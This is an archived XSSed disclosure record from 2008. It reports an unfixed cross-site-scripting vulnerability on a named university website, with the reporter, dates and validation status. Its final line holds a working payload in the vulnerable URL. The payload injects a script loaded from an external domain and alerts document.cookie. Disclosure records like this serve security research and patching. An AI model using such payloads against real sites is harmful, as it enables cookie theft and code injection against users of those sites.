Unfixed XSS vulnerability at www.bim.yildiz.edu.tr

2008-04-15T00:00:00
ID XSSED:35714
Type xssed
Reporter KaBuS
Modified 2008-04-27T00:00:00

Description

Security researcher KaBuS, has submitted on 15/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.bim.yildiz.edu.tr, which at the time of submission ranked 29087 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.bim.yildiz.edu.tr/support/index.php?<script%20language="Javascript"%20src="http://kabustr.com/chat/c.js"%20type="text/javascript">KaBuS-KabusTr.coM-KaBuS-KabusTr.coM</script><script>alert(document.cookie);</script><script>alert(/KaBuS/);</script>